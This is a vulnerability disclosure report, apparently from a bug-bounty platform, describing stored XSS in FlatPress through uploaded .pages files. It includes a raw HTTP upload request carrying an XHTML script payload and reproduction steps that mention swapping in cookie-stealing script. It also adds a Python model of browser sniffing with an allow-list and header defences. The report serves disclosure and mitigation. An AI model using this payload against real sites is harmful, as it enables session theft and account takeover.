Stored XSS via `.pages` File in flatpressblog/flatpress
Valid
Reported on Jan 2nd 2023
Description
When a user uploads a file with the .pages extension through the admin uploader and then requests that file directly, the extension is accepted by the uploader and the stored file is sent back in a response the browser ends up parsing as an XML/XHTML document, so the script element declared in the XHTML namespace executes in the site's origin. Note that the Content-Type: application/octet-stream in the request below is the client-supplied multipart part header, not the server's response header: a response that is actually served as application/octet-stream is downloaded rather than rendered, so confirm the real response header (for example with curl -I against the uploaded file) when reproducing. I only discovered this file extension while doing more research on XSS.
Proof of Concept
POST /flatpress-master/admin.php?p=uploader&action=default HTTP/1.1
Host: localhost
Content-Length: 2051
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryGDdtfAjfJHeGw497
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://localhost/flatpress-master/admin.php?p=uploader
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: fpuser_fp-a37b0eea=admin; fppass_fp-a37b0eea=%242y%2410%2463YIyEccoLYf6kU0s.2lb.D1GcJ7GsnvoWR.aiWBX5alwZmXZpiMK; fpuser_fp-9a36daaa=admin; fppass_fp-9a36daaa=%242y%2410%24k7Y2.YM02Q4HFMKnFhhtTea2.GpaY4XW8JL0U05O%2FTIkIvWg%2FfYyy; fpuser_fp-9b7fc0a2=admin; fppass_fp-9b7fc0a2=%242y%2410%24cxsAXo1XdfPxtztQL8Ehuei7Un1fUCqJG%2Fm7IeIyLG1PIdGXEvxwi; security_level=0; fpsess_fp-9a36daaa=cchci3ludjhp8frr6dleds54b8; fpsess_fp-9b7fc0a2=a0b4ht1pq923t7ao89lgo4fcgb
Connection: close

------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wpnonce"

96b07d2bb9
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="_wp_http_referer"

/flatpress-master/admin.php?p=uploader
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload[]"; filename="xss.pages"
Content-Type: application/octet-stream

<?xml version="1.0" encoding="UTF-8"?>
<html>
<head></head>
<body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
</body>
</html>
------WebKitFormBoundaryGDdtfAjfJHeGw497
Content-Disposition: form-data; name="upload"

Upload
------WebKitFormBoundaryGDdtfAjfJHeGw497--
Steps to take
Log in with an account that can reach the uploader (the PoC uses an admin session), open /admin.php?p=uploader&action=default and upload a .pages file carrying the JavaScript payload, then request the uploaded file directly. The PoC payload only calls alert(window.origin); an attacker would replace it with script that steals the victim's cookies.
Empirical evidence
https://drive.google.com/file/d/1PG8Tiz63Sw6rBeRDPDYrBo4PQjGyikL5/view?usp=sharing
Impact
This vulnerability lets an attacker execute arbitrary JavaScript in the FlatPress site's origin: steal the user's cookies, perform HTTP requests as the victim, read the content of same-origin pages, and so on.
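As an added check for this report (not FlatPress code), the following Python models the browser-side decision the description relies on: a response with no Content-Type is sniffed from its first bytes, an XML prolog sniffs as text/xml, and in a rendered XML document an XHTML-namespaced script element runs; application/octet-stream, Content-Disposition: attachment, or X-Content-Type-Options: nosniff each stop that. It also shows the extension allow-list the uploader should apply. The headers and bodies are constructed inputs, the .pages payload is a copy of the PoC above, the allow-list contents are illustrative, and the assumption that a web server with no MIME mapping for .pages emits no Content-Type is mine, not a claim from the report.

```python
"""Decide whether a stored upload, fetched directly, would run script in the site's origin.

Added example for this report, not FlatPress code. It models the subset of the
WHATWG MIME-sniffing rules that matter here and the response headers that make
an upload inert. All inputs below are constructed for the example.
"""
import re
from typing import Dict, Optional, Tuple

# Constructed copy of the PoC upload body from the report.
POC_PAGES_BODY = b"""<?xml version="1.0" encoding="UTF-8"?>
<html>
<head></head>
<body>
<a:script xmlns:a="http://www.w3.org/1999/xhtml">alert(window.origin)</a:script>
</body>
</html>
"""

# MIME types a browser renders as a document in which script elements execute.
ACTIVE_DOCUMENT_TYPES = {"text/html", "text/xml", "application/xml", "application/xhtml+xml"}

# <script> with or without a namespace prefix (the PoC uses <a:script ...>).
SCRIPT_TAG_RE = re.compile(rb"<(?:[a-z0-9_.-]+:)?script\b", re.IGNORECASE)

# Illustrative allow-list (assumption): anything else, including .pages, is rejected.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "webp", "pdf", "txt", "zip"}

# Response headers that make any stored upload safe to serve from the same origin.
SAFE_UPLOAD_HEADERS = {
    "Content-Type": "application/octet-stream",
    "Content-Disposition": "attachment",
    "X-Content-Type-Options": "nosniff",
}


def sniffed_type(body: bytes) -> Optional[str]:
    """Minimal form of the 'identify an unknown MIME type' step: an XML prolog
    sniffs as text/xml and a leading HTML tag as text/html; anything else is
    treated as a non-document here."""
    head = body[:512].lstrip(b" \t\r\n\x0c")
    if head.startswith(b"<?xml"):
        return "text/xml"
    if re.match(rb"<(?:!doctype html|html|head|body|script|iframe|div|p|a|b)[ >]", head, re.IGNORECASE):
        return "text/html"
    return None


def would_execute_script(headers: Dict[str, str], body: bytes) -> Tuple[bool, str]:
    """Return (script_runs, reason) for a direct GET of the stored file."""
    h = {k.lower(): v for k, v in headers.items()}
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    disposition = h.get("content-disposition", "").split(";")[0].strip().lower()
    nosniff = h.get("x-content-type-options", "").strip().lower() == "nosniff"

    if disposition == "attachment":
        return False, "Content-Disposition: attachment forces a download"
    if ctype == "application/octet-stream":
        return False, "application/octet-stream is downloaded, never rendered"
    if ctype == "":
        if nosniff:
            # With nosniff the scriptable patterns (HTML, XML) are skipped, so
            # an unknown type falls through to text/plain.
            return False, "no Content-Type and nosniff: shown as plain text"
        ctype = sniffed_type(body) or "text/plain"
        reason = f"no Content-Type; browser sniffed {ctype}"
    else:
        reason = f"served as {ctype}"
    if ctype in ACTIVE_DOCUMENT_TYPES and SCRIPT_TAG_RE.search(body):
        return True, reason + ", script element present"
    return False, reason + ", no active content"


def allowed_upload_name(filename: str) -> bool:
    """Extension allow-list check the uploader should apply: case-insensitive and
    taken from the last dot, so 'xss.pages' and 'pic.jpg.PAGES' are both rejected."""
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    return ext in ALLOWED_EXTENSIONS


if __name__ == "__main__":
    # Assumed server behaviour for an unmapped extension (no Content-Type) versus
    # the hardened headers, both run over the PoC body.
    for name, hdrs in [("no Content-Type (unmapped extension)", {}),
                       ("hardened", SAFE_UPLOAD_HEADERS)]:
        runs, why = would_execute_script(hdrs, POC_PAGES_BODY)
        print(f"{name}: executes={runs} ({why})")
    print("xss.pages allowed:", allowed_upload_name("xss.pages"))
```

The two defences are independent: the allow-list keeps unexpected extensions out of the upload directory, and the three response headers make whatever is already stored inert even if the allow-list is bypassed, so apply both.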
We are processing your report and will contact the flatpressblog/flatpress team within 24 hours.
We have contacted a member of the flatpressblog/flatpress team and are waiting to hear back.
The researcher's credibility has increased: +7
The fix bounty has been dropped
This vulnerability has been assigned a CVE
This vulnerability is scheduled to go public on Mar 1st 2023